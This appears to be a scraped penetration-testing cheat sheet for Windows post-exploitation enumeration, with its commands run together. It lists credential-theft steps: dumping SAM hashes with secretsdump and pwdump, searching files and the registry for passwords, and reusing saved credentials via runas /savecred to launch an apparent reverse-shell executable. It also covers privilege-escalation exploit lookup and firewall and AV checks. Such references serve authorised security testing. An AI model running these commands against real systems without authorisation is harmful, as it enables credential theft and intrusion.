🔎Windows Post Enumeration

Automatic
Manual:
Check Firewall and AV
Check firewall :
Last updated

Last updated
impacket-secretsdump -sam SAM -system SYSTEM localpython2 pwdump.py /tools /SYSTEM /tools/SAMpython3 wesng.py /tools/systeminfo.txt -i 'Elevation of Privilege' --exploit-only | morecmdkey /listrunas /savecred /user:admin C:\Path\to\reverse.exefindstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml *.git *.ps1 *.yml
findstr /SIM /C:"GitLab" *.txt #Replace GitLab with any keywordsysteminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"dir /s *pass* == *.configschtasks /query /fo LIST /vget-processreg query HKLM /f password /t REG_SZ /sreg query HKCU /f password /t REG_SZ /swmic qfewmic logicaldiskwhoami /privwhoami /groupsnet usernet user administratornet localgrouparp -a route print netstat -anofindstr /si password *.txt *.ini *.configsc query windefendsc queryex type= servicenetsh advfirewall firewall dumpnetsh firewall show statenetsh firewall show config